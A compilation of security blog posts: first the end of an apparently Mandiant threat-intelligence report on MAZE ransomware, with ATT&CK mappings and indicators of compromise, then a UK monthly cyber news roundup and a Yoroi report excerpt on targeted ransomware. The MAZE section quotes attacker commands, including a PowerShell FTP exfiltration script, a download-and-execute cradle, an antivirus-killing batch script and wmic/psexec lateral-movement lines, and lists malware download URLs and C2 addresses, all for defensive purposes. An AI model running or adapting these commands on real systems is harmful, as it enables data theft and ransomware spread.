            • A100-887 - Command and Control - MAZE, DNS Query #1
            • A100-888 - Command and Control - MAZE, DNS Query #2
            • A100-889 - Command and Control - MAZE, DNS Query #3
            • A100-890 -  Command and Control - MAZE, DNS Query #4
            • A100-891 - Command and Control - MAZE, DNS Query #5
            • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
            • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
            • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
            • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
            • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
            • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
            • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
            • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
            • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
            • A104-052 - Host CLI - Credential Access: Mimikatz
            • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
            • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
            • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
            • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
            • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
            • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
            • A104-493 - Host CLI - Discovery: Enumerate Network Shares
            • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
            • A104-482 - Host CLI - Discovery: Language Query Using reg query
            • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
            • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
            • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
            • A104-027 - Host CLI - Discovery: Process Discovery
            • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
            • A104-029 - Host CLI - Discovery: Remote System Discovery
            • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
            • A104-083 - Host CLI - Discovery: System Info
            • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
            • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
            • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
            • A100-879 - Malicious File Transfer - Adfind.exe, Download
            • A150-046 - Malicious File Transfer - BEACON, Download
            • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
            • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
            • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
            • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
            • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
            • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
            • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
            • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
            • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
            • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
            • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
            • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
            • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
            • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
            • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
            • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
            • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
            • A100-886 - Malicious File Transfer - Rclone.exe, Download
            • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

            Detecting the Techniques

            Platform

            Signature Name

            MVX (covers multiple FireEye technologies)

            Bale Detection

            FE_Ransomware_Win_MAZE_1

            Endpoint Security

            WMIC SHADOWCOPY DELETE (METHODOLOGY)

            MAZE RANSOMWARE (FAMILY)

            Network Security

            Ransomware.Win.MAZE

            Ransomware.Maze

            Ransomware.Maze

            MITRE ATT&CK Mappings

            Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

            MAZE Group 1 MITRE ATT&CK Mapping

            ATT&CK Tactic Category

            Techniques

            Initial Access

            T1133: External Remote Services

            T1078: Valid Accounts

            Execution

            T1059: Command-Line Interface

            T1086: PowerShell

            T1064: Scripting

            T1035: Service Execution

            Persistence

            T1078: Valid Accounts

            T1050: New Service

            Privilege Escalation

            T1078: Valid Accounts

            Defense Evasion

            T1078: Valid Accounts

            T1036: Masquerading

            T1027: Obfuscated Files or Information

            T1064: Scripting

            Credential Access

            T1110: Brute Force

            T1003: Credential Dumping

            Discovery

            T1087: Account Discovery

            T1482: Domain Trust Discovery

            T1083: File and Directory Discovery

            T1135: Network Share Discovery

            T1069: Permission Groups Discovery

            T1018: Remote System Discovery

            T1016: System Network Configuration Discovery

            Lateral Movement

            T1076: Remote Desktop Protocol

            T1105: Remote File Copy

            Collection

            T1005: Data from Local System

            Command and Control

            T1043: Commonly Used Port

            T1105: Remote File Copy

            T1071: Standard Application Layer Protocol

            Exfiltration

            T1002: Data Compressed

            T1048: Exfiltration Over Alternative Protocol

            Impact

            T1486: Data Encrypted for Impact

            T1489: Service Stop

            MAZE Group 2 MITRE ATT&CK Mapping

            ATT&CK Tactic Category

            Techniques

            Initial Access

            T1193: Spearphishing Attachment

            Execution

            T1059: Command-Line Interface

            T1086: PowerShell

            T1085: Rundll32

            T1064: Scripting

            T1204: User Execution

            T1028: Windows Remote Management

            Persistence

            T1078: Valid Accounts

            T1050: New Service

            T1136: Create Account

            Privilege Escalation

            T1078: Valid Accounts

            T1050: New Service

            Defense Evasion

            T1078: Valid Accounts

            T1140: Deobfuscate/Decode Files or Information

            T1107: File Deletion

            T1036: Masquerading

            Credential Access

            T1003: Credential Dumping

            T1081: Credentials in Files

            T1171: LLMNR/NBT-NS Poisoning

            Discovery

            T1087: Account Discovery

            T1482: Domain Trust Discovery

            T1083: File and Directory Discovery

            T1135: Network Share Discovery

            T1069: Permission Groups Discovery

            T1018: Remote System Discovery

            T1033: System Owner/User Discovery

            Lateral Movement

            T1076: Remote Desktop Protocol

            T1028: Windows Remote Management

            Collection

            T1074: Data Staged

            T1005: Data from Local System

            T1039: Data from Network Shared Drive

            Command and Control

            T1043: Commonly Used Port

            T1219: Remote Access Tools

            T1105: Remote File Copy

            T1071: Standard Application Layer Protocol

            T1032: Standard Cryptographic Protocol

            Exfiltration

            T1020: Automated Exfiltration

            T1002: Data Compressed

            T1048: Exfiltration Over Alternative Protocol

            Impact

            T1486: Data Encrypted for Impact

            MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

            ATT&CK Tactic Category

            Techniques

            Initial Access

            T1133: External Remote Services

            T1078: Valid Accounts

            Execution

            T1059: Command-Line Interface

            T1086: PowerShell

            T1064: Scripting

            T1035: Service Execution

            Persistence

            T1078: Valid Accounts

            T1031: Modify Existing Service

            Privilege Escalation

            T1055: Process Injection

            T1078: Valid Accounts

            Defense Evasion

            T1055: Process Injection

            T1078: Valid Accounts

            T1116: Code Signing

            T1089: Disabling Security Tools

            T1202: Indirect Command Execution

            T1112: Modify Registry

            T1027: Obfuscated Files or Information

            T1108: Redundant Access

            T1064: Scripting

            Credential Access

            T1003: Credential Dumping

            Discovery

            T1087: Account Discovery

            T1482: Domain Trust Discovery

            T1083: File and Directory Discovery

            T1069: Permission Groups Discovery

            T1018: Remote System Discovery

            Lateral Movement

            T1097: Pass the Ticket

            T1076: Remote Desktop Protocol

            T1105: Remote File Copy

            T1077: Windows Admin Shares

            Collection

            T1074: Data Staged

            T1039: Data from Network Shared Drive

            Command and Control

            T1043: Commonly Used Port

            T1219: Remote Access Tools

            T1105: Remote File Copy

            T1071: Standard Application Layer Protocol

            T1032: Standard Cryptographic Protocol

            Exfiltration

            T1002: Data Compressed

            Impact

            T1486: Data Encrypted for Impact

            T1490: Inhibit System Recovery

            T1489: Service Stop

            Example Commands Observed in MAZE Ransomware Incidents

            function Enum-UsersFolders($PathEnum)
            {
                $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

                Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
                Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
                Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

                foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

                    foreach($SeachDir in $foldersArr) {
                        Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
                    }
                }
            }

            PowerShell reconnaissance script used to enumerate directories

            $Dir="C:/Windows/Temp/"
            #ftp server
            $ftp = "ftp://<IP Address>/incoming/"
            $user = "<username>"
            $pass = "<password>"
            $webclient = New-Object System.Net.WebClient
            $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
            #list every sql server trace file
            foreach($item in (dir $Dir "*.7z")){
               "Uploading $item..."
               $uri = New-Object System.Uri($ftp+$item.Name)
               $webclient.UploadFile($uri, $item.FullName)
            }

            Decoded FTP upload PowerShell script

            powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

            Decoded FTP upload PowerShell script

            […]
            echo 7
            echo 7
            taskkill /im csrss_tc.exe /f
            taskkill /im kwsprod.exe /f
            taskkill /im avkwctl.exe /f
            taskkill /im rnav.exe /f
            taskkill /im crssvc.exe /f
            sc config CSAuth start= disabled
            taskkill /im vsserv.exe /f
            taskkill /im ppmcativedetection.exe /f
            […]
            taskkill /im sahookmain.exe /f
            taskkill /im mcinfo.exe /f
            reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
            netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
            c:\windows\temp\sss.exe

            Excerpt from windows.bat kill script

            start copy sss.exe \\<internal IP>\c$\windows\temp\
            start copy sss.exe \\<internal IP>\c$\windows\temp\

            start copy windows.bat \\<internal IP>\c$\windows\temp\
            start copy windows.bat \\<internal IP>\c$\windows\temp\

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

            start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

            Example commands from MAZE distribution scripts

            @echo off
            del done.txt
            del offline.txt
            rem Loop thru list of computer names in file specified on command-line
            for /f %%i in (%1) do call :check_machine %%i
            goto end
            :check_machine
            rem Check to see if machine is up.
            ping -n 1 %1|Find "TTL=" >NUL 2>NUL
            if errorlevel 1 goto down
            echo %1
            START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
            timeout 1 > NUL
            echo %1 >> done.txt
            rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
            START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
            goto end
            :down
              rem Report machine down
              echo %1 >> offline.txt
            :end

            Example MAZE distribution script

            Indicators of Compromise

            Maze Payloads

            064058cf092063a5b69ed8fd2a1a04fe

            0f841c6332c89eaa7cac14c9d5b1d35b

            108a298b4ed5b4e77541061f32e55751

            11308e450b1f17954f531122a56fae3b

            15d7dd126391b0e7963c562a6cf3992c

            21a563f958b73d453ad91e251b11855c

            27c5ecbb94b84c315d56673a851b6cf9

            2f78ff32cbb3c478865a88276248d419

            335aba8d135cc2e66549080ec9e8c8b7

            3bfcba2dd05e1c75f86c008f4d245f62

            46b98ee908d08f15137e509e5e69db1b

            5774f35d180c0702741a46d98190ff37

            5df79164b6d0661277f11691121b1d53

            658e9deec68cf5d33ee0779f54806cc2

            65cf08ffaf12e47de8cd37098aac5b33

            79d137d91be9819930eeb3876e4fbe79

            8045b3d2d4a6084f14618b028710ce85

            8205a1106ae91d0b0705992d61e84ab2

            83b8d994b989f6cbeea3e1a5d68ca5d8

            868d604146e7e5cb5995934b085846e3

            87239ce48fc8196a5ab66d8562f48f26

            89e1ddb8cc86c710ee068d6c6bf300f4

            910aa49813ee4cc7e4fa0074db5e454a

            9eb13d56c363df67490bcc2149229e4c

            a0c5b4adbcd9eb6de9d32537b16c423b

            a3a3495ae2fc83479baeaf1878e1ea84

            b02be7a336dcc6635172e0d6ec24c554

            b40a9eda37493425782bda4a3d9dad58

            b4d6cb4e52bb525ebe43349076a240df

            b6786f141148925010122819047d1882

            b93616a1ea4f4a131cc0507e6c789f94

            bd9838d84fd77205011e8b0c2bd711e0

            be537a66d01c67076c8491b05866c894

            bf2e43ff8542e73c1b27291e0df06afd

            c3ce5e8075f506e396ee601f2757a2bd

            d2dda72ff2fbbb89bd871c5fc21ee96a

            d3eaab616883fcf51dcbdb4769dd86df

            d552be44a11d831e874e05cadafe04b6

            deebbea18401e8b5e83c410c6d3a8b4e

            dfa4631ec2b8459b1041168b1b1d5105

            e57ba11045a4b7bc30bd2d33498ef194

            e69a8eb94f65480980deaf1ff5a431a6

            ef95c48e750c1a3b1af8f5446fa04f54

            f04d404d84be66e64a584d425844b926

            f457bb5060543db3146291d8c9ad1001

            f5ecda7dd8bb1c514f93c09cea8ae00d

            f83cef2bf33a4d43e58b771e81af3ecc

            fba4cbb7167176990d5a8d24e9505f71

            Maze Check-in IPs

            91.218.114.11

            91.218.114.25

            91.218.114.26

            91.218.114.31

            91.218.114.32

            91.218.114.37

            91.218.114.38

            91.218.114.4

            91.218.114.77

            91.218.114.79

            92.63.11.151

            92.63.15.6 

            92.63.15.8 

            92.63.17.245

            92.63.194.20

            92.63.194.3

            92.63.29.137

            92.63.32.2 

            92.63.32.52

            92.63.32.55

            92.63.32.57

            92.63.37.100

            92.63.8.47

            Maze-related Domains

            aoacugmutagkwctu[.]onion

            mazedecrypt[.]top 

            mazenews[.]top

            newsmaze[.]top

            Maze Download URLs

            http://104.168.174.32/wordupd_3.0.1.tmp

            http://104.168.198.208/wordupd.tmp

            http://104.168.201.35/dospizdos.tmp

            http://104.168.201.47/wordupd.tmp

            http://104.168.215.54/wordupd.tmp

            http://149.56.245.196/wordupd.tmp

            http://192.119.106.235/mswordupd.tmp

            http://192.119.106.235/officeupd.tmp

            http://192.99.172.143/winupd.tmp

            http://54.39.233.188/win163.65.tmp

            http://91.208.184.174:8079/windef.exe

            http://agenziainformazioni[.]icu/wordupd.tmp

            http://www.download-invoice[.]site/Invoice_29557473.exe

            Malicious Documents

            1a26c9b6ba40e4e3c3dce12de266ae10

            53d5bdc6bd7904b44078cf80e239d42b

            79271dc08052480a578d583a298951c5

            a2d631fcb08a6c840c23a8f46f6892dd

            ad30987a53b1b0264d806805ce1a2561

            c09af442e8c808c953f4fa461956a30f

            ee26e33725b14850b1776a67bd8f2d0a

            BEACON C2s

            173.209.43.61

            193.36.237.173

            37.1.213.9

            37.252.7.142

            5.199.167.188

            checksoffice[.]me

            drivers.updatecenter[.]icu

            plaintsotherest[.]net

            thesawmeinrew[.]net

            updates.updatecenter[.]icu

            Cobalt Strike Binaries

            7507fe19afbda652e9b2768c10ad639f

            a93b86b2530cc988f801462ead702d84

            4f57e35a89e257952c3809211bef78ea

            bad6fc87a98d1663be0df23aedaf1c62

            f5ef96251f183f7fc63205d8ebf30cbf

            c818cc38f46c604f8576118f12fd0a63

            078cf6db38725c37030c79ef73519c0c

            c255daaa8abfadc12c9ae8ae2d148b31

            1fef99f05bf5ae78a28d521612506057

            cebe4799b6aff9cead533536b09fecd1

            4ccca6ff9b667a01df55326fcc850219

            bad6fc87a98d1663be0df23aedaf1c62

            Meterpreter C2s

            5.199.167.188

            Other Related Files

            3A5A9D40D4592C344920DD082029B362 (related script)

            76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

            b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

            fad3c6914d798e29a3fd8e415f1608f4 (related script)

            Tools & Utilities

            27304b246c7d5b4e149124d5f93c5b01 (PsExec)

            42badc1d2f03a8b1e4875740d3d49336 (7zip)

            75b55bb34dac9d02740b9ad6b6820360 (PsExec)

            9b02dd2a1a15e94922be3f85129083ac (AdFind)

            c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

            f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

            Email Sender Domains

            att-customer[.]com

            att-information[.]com

            att-newsroom[.]com

            att-plans[.]com

            bezahlen-1und1[.]icu

            bzst-info[.]icu

            bzst-inform[.]icu

            bzstinfo[.]icu

            bzstinform[.]icu

            canada-post[.]icu

            canadapost-delivery[.]icu

            canadapost-tracking[.]icu

            hilfe-center-1und1[.]icu

            hilfe-center-internetag[.]icu

            trackweb-canadapost[.]icu

            Sender Domain Registrant Addresses

            abusereceive@hitler.rocks

            gladkoff1991@yandex.ru

            Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

            Cyber Security Roundup for May 2020

            A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, April 2020.

            As well reported, UK foreign exchange firm Travelex business operations were brought to a standstill after its IT systems were severely hit by the Sodinokibi ransomware at the start of the year. It was reported that
             REvil group were behind the attack and had stolen 5Gbs of customer personal data, and then demanded $6 million (£4.6m) in ransom. The Wall Street Journal reported in April 2020 that Travelex had reached a deal, paying $2.3 million (£1.84m) in Bitcoin to the cybercriminals. This sort of response incentivises future ransomware activity against all other businesses and could lead to an inflation of future cyber-extortion demands in my opinion.

            Cognizant, a US large digital solutions provider and IT consultancy, was reportedly hit by the Maze ransomware.  Maze, previously known as the 'ChaCha' ransomware, like the Travelex attack, not only encrypts victim's files but steals sensitive data from the IT systems as well. Enabling the bad guys to threaten the publishing of the stolen data if the organisation cough up to their cyber-extortion demands, so the bad guys are very much rinsing and repeating lucrative attacks.

            Microsoft wrote an excellent blog covering the 'motley crew' of ransomware payloads  The blog covers ransomware payloads said to be straining security operations especially in health care, Microsoft warned, urging security teams to look for signs of credential theft and lateral movement activities that herald attacks.

            Researchers continue to be busy in exposing large sensitive datasets within misconfigured cloud services.  In April researchers reported 14 million Ring user details exposed in misconfigured AWS open database, fitness software Kinomap had 42 million user details exposed in another misconfigured database, and Maropost had 95 million users exposed, also in a misconfigured database.

            Nintendo confirmed 160,000 of its users' accounts had been accessed, exposing PII and Nintendo store accounts. The gaming giant Nintendo said from April, its user's accounts were accessed through the Nintendo Network ID (NNID), which is primarily used for Switch gaming. The company is unaware exactly how the intrusion had occurred, saying it “seems to have been made by impersonating login to “Nintendo Network ID. “If you use the same password for your NNID and Nintendo account, your balance and registered credit card / PayPal may be illegally used at My Nintendo Store or Nintendo eShop. Please set different passwords for NNID and Nintendo account,” Nintendo said. In response to these issues the company has abolished user’s ability to log into their Nintendo account via NNID and passwords for both NNID and Nintendo accounts are being reset and the company is recommending multi-factor authentication be set up for each account.  The account breaches weren't the only cyber issue affecting Nintendo in April, it reported that a bot, dubbed 'Bird Bot' was used by a reseller to buy up Nintendo Switches before customers could make their Switch purchase from Nintendo. The bot using reseller benefits at the expense of consumers, in buying up all available Switches directly from Nintendo, they are able to sell them on for higher prices, so making a quick and easy tidy profit, due to the current high demand of Switches and lack of supply.

            April was a busy month for security updates, Microsoft released security patches fixing 113 vulnerabilities on Patch Tuesday and an out-of-band patch for Teams found by researchers at CyberArk. Patch Tuesday for a quiet one for Adobe, though they released fixes for 21 critical vulnerabilities in illustrator and Bridge at the end of the month.  Oracle released a huge 397 fixes for 450 CVEs in over 100 products, which I think is a new record for a patch release!  

            Sophos said it and its customers were attacked when a previously unknown SQL injection vulnerability in their physical and virtual XG Firewall units was exploited. “The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected,Sophos said.

            There were security critical patch releases for Mozilla Firefox, Chrome (twice), and for 8 Cisco products. A bunch of VMware patches for including a CVSS scored 10 (highest possible) in vCenter, a critical in vRealize Log Insight and a critical cross-site scripting vulnerability in ESXi 6.5 and 6.7. And finally, on the patch front, Intel decided to discontinue multiple products, as it was unable to keep ahead of patch their vulnerabilities.

            Stay safe, safe home and watch for the scams.

            BLOG
            NEWS

            AWARENESS, EDUCATION AND THREAT INTELLIGENCE

              Cybersecurity Trends

              Trends are interesting since they could tell you where things are going.

              I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

              The Rise of Targeted Ransomware

              2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

              During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
              In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

              Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

              During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

              Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
              Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
              During 2019, we observed a strong game change in the ransomware attacks panorama.

              The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

              We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
              In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

              The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

              Zero-Day Malware

              Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

              As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

              threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
              In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

              Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

              The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
              Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

              Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
              This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

              Immagine che contiene dispositivo

Descrizione generata automaticamente

              A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

